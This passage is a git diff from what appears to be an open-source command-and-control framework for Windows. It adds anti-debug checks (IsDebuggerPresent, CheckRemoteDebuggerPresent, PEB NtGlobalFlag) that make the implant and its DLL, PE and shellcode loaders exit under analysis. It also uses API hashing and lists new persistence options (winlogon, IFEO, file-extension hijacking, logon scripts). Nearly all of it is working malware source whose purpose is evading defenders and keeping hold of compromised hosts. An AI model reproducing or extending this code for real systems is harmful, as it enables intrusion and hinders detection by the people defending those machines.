Handler::Task(pState); diff --git a/payload/win/implant/src/main/beacon_dll.cpp b/payload/win/implant/src/main/beacon_dll.cpp index 105701a..1653eb4 100644 --- a/payload/win/implant/src/main/beacon_dll.cpp +++ b/payload/win/implant/src/main/beacon_dll.cpp @@ -17,6 +17,11 @@ DWORD WINAPI ThreadProc(LPVOID lpParam) #else FALSE, #endif + #ifdef PAYLOAD_ANTI_DEBUG + TRUE, + #else + FALSE, + #endif LISTENER_PROTOCOL_W, LISTENER_HOST_W, (INTERNET_PORT)LISTENER_PORT, diff --git a/payload/win/implant/src/main/beacon_exe.cpp b/payload/win/implant/src/main/beacon_exe.cpp index d7d1cf3..2502702 100644 --- a/payload/win/implant/src/main/beacon_exe.cpp +++ b/payload/win/implant/src/main/beacon_exe.cpp @@ -11,6 +11,11 @@ INT WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine #else FALSE, #endif + #ifdef PAYLOAD_ANTI_DEBUG + TRUE, + #else + FALSE, + #endif LISTENER_PROTOCOL_W, LISTENER_HOST_W, (INTERNET_PORT)LISTENER_PORT, diff --git a/payload/win/loader/CMakeLists.txt b/payload/win/loader/CMakeLists.txt index deb8aab..1fffc8e 100644 --- a/payload/win/loader/CMakeLists.txt +++ b/payload/win/loader/CMakeLists.txt @@ -35,6 +35,9 @@ add_compile_definitions(AES_IV_BASE64=${AES_IV_BASE64}) if(${PAYLOAD_INDIRECT_SYSCALLS} STREQUAL "true") add_compile_definitions(PAYLOAD_INDIRECT_SYSCALLS=${PAYLOAD_INDIRECT_SYSCALLS}) endif() +if(${PAYLOAD_ANTI_DEBUG} STREQUAL "true") + add_compile_definitions(PAYLOAD_ANTI_DEBUG=${PAYLOAD_ANTI_DEBUG}) +endif() if(${PAYLOAD_FORMAT} STREQUAL "bin") add_compile_definitions(IS_SHELLCODE=1) endif() @@ -49,9 +52,6 @@ set(SOURCE_CORE src/hermit.cpp src/core/crypt.cpp src/core/procs.cpp - src/core/technique/injection/dll_injection.cpp - src/core/technique/injection/pe_injection.cpp - src/core/technique/injection/shellcode_injection.cpp src/core/handler.cpp src/core/state.cpp src/core/stdout.cpp @@ -62,6 +62,10 @@ set(SOURCE_CORE src/core/system/handle.cpp src/core/system/http.cpp src/core/system/process.cpp + src/core/technique/anti_debug.cpp + src/core/technique/injection/dll_injection.cpp + src/core/technique/injection/pe_injection.cpp + src/core/technique/injection/shellcode_injection.cpp src/core/utils/convert.cpp ) if(${PAYLOAD_TYPE} STREQUAL \"dll-loader\") diff --git a/payload/win/loader/include/core/procs.hpp b/payload/win/loader/include/core/procs.hpp index cb66ebe..ca3d700 100644 --- a/payload/win/loader/include/core/procs.hpp +++ b/payload/win/loader/include/core/procs.hpp @@ -49,7 +49,9 @@ #define APIHASH_RTLSTRINGCCHCOPYW 0x32231e60 #define APIHASH_RTLSTRINGCCHLENGTHW 0x28821d8f #define APIHASH_RTLZEROMEMORY 0x899c0d1e +#define APIHASH_CHECKREMOTEDEBUGGERPRESENT 0x478dd921 #define APIHASH_CREATETHREADPOOLWAIT 0x7a8370ac +#define APIHASH_ISDEBUGGERPRESENT 0xef4ed1b #define APIHASH_SETTHREADPOOLWAIT 0x5f2a3808 #define APIHASH_WINHTTPCLOSEHANDLE 0x22081731 #define APIHASH_WINHTTPCONNECT 0xe18b30db @@ -151,8 +153,12 @@ namespace Procs typedef VOID (NTAPI* LPPROC_RTLZEROMEMORY)(PVOID Destination, SIZE_T Length); // **WINAPIs** + // CheckRemoteDebuggerPresent + typedef BOOL (WINAPI* LPPROC_CHECKREMOTEDEBUGGERPRESENT)(HANDLE hProcess, PBOOL pbDebuggerPresent); // CreateThreadpoolWait typedef PTP_WAIT (WINAPI* LPPROC_CREATETHREADPOOLWAIT)(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe); + // IsDebuggerPresent + typedef BOOL (WINAPI* LPPROC_ISDEBUGGERPRESENT)(); // SetThreadpoolWait typedef VOID (WINAPI* LPPROC_SETTHREADPOOLWAIT)(PTP_WAIT pwa, HANDLE h, PFILETIME pftTimeout); // WinHttpCloseHandle @@ -222,7 +228,9 @@ namespace Procs LPPROC_RTLZEROMEMORY lpRtlZeroMemory = nullptr; // **WINAPI** + LPPROC_CHECKREMOTEDEBUGGERPRESENT lpCheckRemoteDebuggerPresent = nullptr; LPPROC_CREATETHREADPOOLWAIT lpCreateThreadpoolWait = nullptr; + LPPROC_ISDEBUGGERPRESENT lpIsDebuggerPresent = nullptr; LPPROC_SETTHREADPOOLWAIT lpSetThreadpoolWait = nullptr; LPPROC_WINHTTPCLOSEHANDLE lpWinHttpCloseHandle = nullptr; LPPROC_WINHTTPCONNECT lpWinHttpConnect = nullptr; diff --git a/payload/win/loader/include/core/technique.hpp b/payload/win/loader/include/core/technique.hpp index c9dd355..9bf6646 100644 --- a/payload/win/loader/include/core/technique.hpp +++ b/payload/win/loader/include/core/technique.hpp @@ -21,6 +21,17 @@ typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); #define DEREF_16(name)*(WORD *)(name) #define DEREF_8(name)*(BYTE *)(name) +// Used for Anti-Debug +#define FLG_HEAP_ENABLE_TAIL_CHECK 0x10 +#define FLG_HEAP_ENABLE_FREE_CHECK 0x20 +#define FLG_HEAP_VALIDATE_PARAMETERS 0x40 +#define NT_GLOBAL_FLAG_DEBUGGED (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS) + +namespace Technique::AntiDebug +{ + VOID StopIfDebug(Procs::PPROCS pProcs); +} + namespace Technique::Injection::Helper { DWORD Rva2Offset( diff --git a/payload/win/loader/script/calc_api_hash.py b/payload/win/loader/script/calc_api_hash.py index 0699378..95ad77f 100644 --- a/payload/win/loader/script/calc_api_hash.py +++ b/payload/win/loader/script/calc_api_hash.py @@ -43,7 +43,9 @@ "RtlZeroMemory", # WINAPI + "CheckRemoteDebuggerPresent", "CreateThreadpoolWait", + "IsDebuggerPresent", "SetThreadpoolWait", "WinHttpCloseHandle", "WinHttpConnect", diff --git a/payload/win/loader/src/core/procs.cpp b/payload/win/loader/src/core/procs.cpp index 9692346..2931fb3 100644 --- a/payload/win/loader/src/core/procs.cpp +++ b/payload/win/loader/src/core/procs.cpp @@ -132,32 +132,36 @@ namespace Procs pProcs->lpRtlZeroMemory = reinterpret_cast(pRtlZeroMemory); // WINAPI - PVOID pCreateThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_CREATETHREADPOOLWAIT); - pProcs->lpCreateThreadpoolWait = reinterpret_cast(pCreateThreadpoolWait); - PVOID pSetThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_SETTHREADPOOLWAIT); - pProcs->lpSetThreadpoolWait = reinterpret_cast(pSetThreadpoolWait); - PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); - pProcs->lpWinHttpCloseHandle = reinterpret_cast(pWinHttpCloseHandle); - PVOID pWinHttpConnect = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCONNECT); - pProcs->lpWinHttpConnect = reinterpret_cast(pWinHttpConnect); - PVOID pWinHttpOpen = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPEN); - pProcs->lpWinHttpOpen = reinterpret_cast(pWinHttpOpen); - PVOID pWinHttpOpenRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPENREQUEST); - pProcs->lpWinHttpOpenRequest = reinterpret_cast(pWinHttpOpenRequest); - PVOID pWinHttpQueryDataAvailable = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYDATAAVAILABLE); - pProcs->lpWinHttpQueryDataAvailable = reinterpret_cast(pWinHttpQueryDataAvailable); - PVOID pWinHttpQueryHeaders = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYHEADERS); - pProcs->lpWinHttpQueryHeaders = reinterpret_cast(pWinHttpQueryHeaders); - PVOID pWinHttpReadData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPREADDATA); - pProcs->lpWinHttpReadData = reinterpret_cast(pWinHttpReadData); - PVOID pWinHttpReceiveResponse = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPRECEIVERESPONSE); - pProcs->lpWinHttpReceiveResponse = reinterpret_cast(pWinHttpReceiveResponse); - PVOID pWinHttpSendRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSENDREQUEST); - pProcs->lpWinHttpSendRequest = reinterpret_cast(pWinHttpSendRequest); - PVOID pWinHttpSetOption = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSETOPTION); - pProcs->lpWinHttpSetOption = reinterpret_cast(pWinHttpSetOption); - PVOID pWinHttpWriteData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPWRITEDATA); - pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); + PVOID pCheckRemoteDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_CHECKREMOTEDEBUGGERPRESENT); + pProcs->lpCheckRemoteDebuggerPresent = reinterpret_cast(pCheckRemoteDebuggerPresent); + PVOID pCreateThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_CREATETHREADPOOLWAIT); + pProcs->lpCreateThreadpoolWait = reinterpret_cast(pCreateThreadpoolWait); + PVOID pIsDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_ISDEBUGGERPRESENT); + pProcs->lpIsDebuggerPresent = reinterpret_cast(pIsDebuggerPresent); + PVOID pSetThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_SETTHREADPOOLWAIT); + pProcs->lpSetThreadpoolWait = reinterpret_cast(pSetThreadpoolWait); + PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); + pProcs->lpWinHttpCloseHandle = reinterpret_cast(pWinHttpCloseHandle); + PVOID pWinHttpConnect = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCONNECT); + pProcs->lpWinHttpConnect = reinterpret_cast(pWinHttpConnect); + PVOID pWinHttpOpen = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPEN); + pProcs->lpWinHttpOpen = reinterpret_cast(pWinHttpOpen); + PVOID pWinHttpOpenRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPENREQUEST); + pProcs->lpWinHttpOpenRequest = reinterpret_cast(pWinHttpOpenRequest); + PVOID pWinHttpQueryDataAvailable = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYDATAAVAILABLE); + pProcs->lpWinHttpQueryDataAvailable = reinterpret_cast(pWinHttpQueryDataAvailable); + PVOID pWinHttpQueryHeaders = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYHEADERS); + pProcs->lpWinHttpQueryHeaders = reinterpret_cast(pWinHttpQueryHeaders); + PVOID pWinHttpReadData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPREADDATA); + pProcs->lpWinHttpReadData = reinterpret_cast(pWinHttpReadData); + PVOID pWinHttpReceiveResponse = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPRECEIVERESPONSE); + pProcs->lpWinHttpReceiveResponse = reinterpret_cast(pWinHttpReceiveResponse); + PVOID pWinHttpSendRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSENDREQUEST); + pProcs->lpWinHttpSendRequest = reinterpret_cast(pWinHttpSendRequest); + PVOID pWinHttpSetOption = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSETOPTION); + pProcs->lpWinHttpSetOption = reinterpret_cast(pWinHttpSetOption); + PVOID pWinHttpWriteData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPWRITEDATA); + pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); if (bIndirectSyscall) { diff --git a/payload/win/loader/src/core/technique/anti_debug.cpp b/payload/win/loader/src/core/technique/anti_debug.cpp new file mode 100644 index 0000000..d40c7dc --- /dev/null +++ b/payload/win/loader/src/core/technique/anti_debug.cpp @@ -0,0 +1,39 @@ +#include "core/technique.hpp" + +namespace Technique::AntiDebug +{ + // Reference: + // https://evasions.checkpoint.com/src/Anti-Debug/techniques/debug-flags.html + VOID StopIfDebug(Procs::PPROCS pProcs) + { + // 1. Check with IsDebuggerPresent + if (pProcs->lpIsDebuggerPresent()) + { + ExitProcess(-1); + } + + // 2. Check with CheckRemoteDebuggerPresent + BOOL bRemoteDebuggerPresent; + if (pProcs->lpCheckRemoteDebuggerPresent( + NtCurrentProcess(), + &bRemoteDebuggerPresent + ) && bRemoteDebuggerPresent) + { + ExitProcess(-1); + } + + // 3. Check with NtGlobalFlag + #ifdef _WIN64 + PPEB pPeb = (PPEB)__readgsqword(0x60); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0xBC); + #else + PPEB pPeb = (PPEB)__readgsqword(0x30); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0x68); + #endif + + if (dwNtGlobalFlag & NT_GLOBAL_FLAG_DEBUGGED) + { + ExitProcess(-1); + } + } +} \ No newline at end of file diff --git a/payload/win/loader/src/hermit.cpp b/payload/win/loader/src/hermit.cpp index 9519875..ab22313 100644 --- a/payload/win/loader/src/hermit.cpp +++ b/payload/win/loader/src/hermit.cpp @@ -93,10 +93,17 @@ namespace Hermit } VOID DLLLoader() - { + { State::PSTATE pState = Init(); if (!pState) + { return; + } + + // Anti-Debug + #ifdef PAYLOAD_ANTI_DEBUG + Technique::AntiDebug::StopIfDebug(pState->pProcs); + #endif // Download DLL std::vector bytes = Download(pState); @@ -127,7 +134,14 @@ namespace Hermit { State::PSTATE pState = Init(); if (!pState) + { return; + } + + // Anti-Debug + #ifdef PAYLOAD_ANTI_DEBUG + Technique::AntiDebug::StopIfDebug(pState->pProcs); + #endif // Download PE std::vector bytes = Download(pState); @@ -156,10 +170,17 @@ namespace Hermit } VOID ShellcodeLoader() - { + { State::PSTATE pState = Init(); if (!pState) + { return; + } + + // Anti-Debug + #ifdef PAYLOAD_ANTI_DEBUG + Technique::AntiDebug::StopIfDebug(pState->pProcs); + #endif // Download shellcode std::vector bytes = Download(pState); diff --git a/pkg/client/rpc/request.go b/pkg/client/rpc/request.go index f426198..c7d4567 100644 --- a/pkg/client/rpc/request.go +++ b/pkg/client/rpc/request.go @@ -212,6 +212,7 @@ func RequestPayloadImplantGenerate(clientState *state.ClientState, imp *payload. Jitter: int64(imp.Jitter), KillDate: int64(imp.KillDate), IndirectSyscalls: imp.IndirectSyscalls, + AntiDebug: imp.AntiDebug, }) if err != nil { return []byte{}, err @@ -230,6 +231,7 @@ func RequestPayloadLoaderGenerate(clientState *state.ClientState, ldr *payload.L Technique: ldr.Technique, ProcessToInject: ldr.ProcessToInject, IndirectSyscalls: ldr.IndirectSyscalls, + AntiDebug: ldr.AntiDebug, }) if err != nil { return []byte{}, err diff --git a/pkg/common/parser/amtaskcommand.go b/pkg/common/parser/amtaskcommand.go index 918ea10..830b4c6 100644 --- a/pkg/common/parser/amtaskcommand.go +++ b/pkg/common/parser/amtaskcommand.go @@ -595,10 +595,14 @@ func (c *amTaskPersistCmd) Run( // Select the technique items := []string{ "runkey", + "user-init-mpr-logon-script", "screensaver", - // "registry/netsh", + "default-file-extension-hijacking", + "ifeo", + // "netsh", // "schedule", // "service", + "winlogon", "(cancel)", } res, err := stdin.Select("Technique", items) diff --git a/pkg/common/wizard/payload.go b/pkg/common/wizard/payload.go index 00202ef..b13c283 100644 --- a/pkg/common/wizard/payload.go +++ b/pkg/common/wizard/payload.go @@ -307,6 +307,17 @@ func WizardPayloadImplant( break } + var oAntiDebug bool = false + for { + yes, err := stdin.Confirm("Enable Anti-Debug?") + if err != nil { + stdout.LogFailed(fmt.Sprint(err)) + continue + } + oAntiDebug = yes + break + } + table := []stdout.SingleTableItem{ stdout.NewSingleTableItem("Type", oType), stdout.NewSingleTableItem("Target OS", oOs), @@ -317,6 +328,7 @@ func WizardPayloadImplant( stdout.NewSingleTableItem("Jitter", fmt.Sprint(oJitter)), stdout.NewSingleTableItem("KillDate (UTC)", oKillDateStr), stdout.NewSingleTableItem("Indirect Syscalls", fmt.Sprintf("%t", oIndirectSyscalls)), + stdout.NewSingleTableItem("Anti-Debug", fmt.Sprintf("%t", oAntiDebug)), } stdout.PrintSingleTable("Implant Options", table) @@ -346,6 +358,7 @@ func WizardPayloadImplant( oJitter, oKillDate, oIndirectSyscalls, + oAntiDebug, ), nil } @@ -441,6 +454,17 @@ func WizardPayloadLoader( break } + var oAntiDebug bool = false + for { + yes, err := stdin.Confirm("Enable Anti-Debug?") + if err != nil { + stdout.LogFailed(fmt.Sprint(err)) + continue + } + oAntiDebug = yes + break + } + table := []stdout.SingleTableItem{ stdout.NewSingleTableItem("Target OS", oOs), stdout.NewSingleTableItem("Target Arch", oArch), @@ -450,6 +474,7 @@ func WizardPayloadLoader( stdout.NewSingleTableItem("Injection Technique", oTechnique), stdout.NewSingleTableItem("Target Process", oProcessToInject), stdout.NewSingleTableItem("Indirect Syscalls", fmt.Sprintf("%t", oIndirectSyscalls)), + stdout.NewSingleTableItem("Anti-Debug", fmt.Sprintf("%t", oAntiDebug)), } stdout.PrintSingleTable("Loader Options", table) @@ -480,6 +505,7 @@ func WizardPayloadLoader( oTechnique, oProcessToInject, oIndirectSyscalls, + oAntiDebug, ), nil } diff --git a/pkg/protobuf/rpcpb/rpc.pb.go b/pkg/protobuf/rpcpb/rpc.pb.go index 2d09037..d29ad21 100644 --- a/pkg/protobuf/rpcpb/rpc.pb.go +++ b/pkg/protobuf/rpcpb/rpc.pb.go @@ -269,6 +269,7 @@ type PayloadImplant struct { Jitter int64 `protobuf:"varint,12,opt,name=jitter,proto3" json:"jitter,omitempty"` KillDate int64 `protobuf:"varint,13,opt,name=killDate,proto3" json:"killDate,omitempty"` IndirectSyscalls bool `protobuf:"varint,14,opt,name=indirectSyscalls,proto3" json:"indirectSyscalls,omitempty"` + AntiDebug bool `protobuf:"varint,15,opt,name=antiDebug,proto3" json:"antiDebug,omitempty"` } func (x *PayloadImplant) Reset() { @@ -401,6 +402,13 @@ func (x *PayloadImplant) GetIndirectSyscalls() bool { return false } +func (x *PayloadImplant) GetAntiDebug() bool { + if x != nil { + return x.AntiDebug + } + return false +} + type PayloadLoader struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache @@ -419,6 +427,7 @@ type PayloadLoader struct { Technique string `protobuf:"bytes,11,opt,name=technique,proto3" json:"technique,omitempty"` ProcessToInject string `protobuf:"bytes,12,opt,name=processToInject,proto3" json:"processToInject,omitempty"` IndirectSyscalls bool `protobuf:"varint,13,opt,name=indirectSyscalls,proto3" json:"indirectSyscalls,omitempty"` + AntiDebug bool `protobuf:"varint,14,opt,name=antiDebug,proto3" json:"antiDebug,omitempty"` } func (x *PayloadLoader) Reset() { @@ -544,6 +553,13 @@ func (x *PayloadLoader) GetIndirectSyscalls() bool { return false } +func (x *PayloadLoader) GetAntiDebug() bool { + if x != nil { + return x.AntiDebug + } + return false +} + type PayloadShellcode struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache @@ -967,7 +983,7 @@ var file_rpcpb_rpc_proto_rawDesc = []byte{ 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x20, 0x0a, 0x0b, 0x70, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x70, 0x61, - 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0xd8, 0x02, 0x0a, 0x0e, 0x50, 0x61, + 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0xf6, 0x02, 0x0a, 0x0e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, @@ -989,175 +1005,179 @@ var file_rpcpb_rpc_proto_rawDesc = []byte{ 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, 0x65, 0x12, 0x2a, 0x0a, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x18, 0x0e, 0x20, 0x01, 0x28, 0x08, 0x52, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, - 0x61, 0x6c, 0x6c, 0x73, 0x22, 0xd5, 0x02, 0x0a, 0x0d, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, - 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, - 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, - 0x0a, 0x02, 0x6f, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, - 0x0a, 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, - 0x63, 0x68, 0x12, 0x16, 0x0a, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, - 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, - 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, - 0x74, 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, - 0x0a, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x09, 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, - 0x70, 0x6f, 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x74, 0x65, 0x63, 0x68, - 0x6e, 0x69, 0x71, 0x75, 0x65, 0x18, 0x0b, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x74, 0x65, 0x63, - 0x68, 0x6e, 0x69, 0x71, 0x75, 0x65, 0x12, 0x28, 0x0a, 0x0f, 0x70, 0x72, 0x6f, 0x63, 0x65, 0x73, - 0x73, 0x54, 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x0f, 0x70, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x54, 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, - 0x12, 0x2a, 0x0a, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, - 0x61, 0x6c, 0x6c, 0x73, 0x18, 0x0d, 0x20, 0x01, 0x28, 0x08, 0x52, 0x10, 0x69, 0x6e, 0x64, 0x69, - 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x22, 0x80, 0x02, 0x0a, - 0x10, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, - 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, - 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, - 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x6f, 0x73, 0x18, - 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, 0x04, 0x61, 0x72, 0x63, - 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, 0x68, 0x12, 0x16, 0x0a, - 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x66, - 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, - 0x6f, 0x6c, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, - 0x63, 0x6f, 0x6c, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x08, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x70, 0x6f, - 0x72, 0x74, 0x18, 0x09, 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x12, - 0x12, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x74, - 0x79, 0x70, 0x65, 0x12, 0x1a, 0x0a, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x18, - 0x0b, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x22, - 0xed, 0x02, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, - 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, - 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, - 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, - 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x69, - 0x70, 0x12, 0x0e, 0x0a, 0x02, 0x6f, 0x73, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, - 0x73, 0x12, 0x12, 0x0a, 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x04, 0x61, 0x72, 0x63, 0x68, 0x12, 0x1a, 0x0a, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, - 0x65, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, - 0x65, 0x12, 0x20, 0x0a, 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x55, 0x52, 0x4c, - 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, - 0x55, 0x52, 0x4c, 0x12, 0x20, 0x0a, 0x0b, 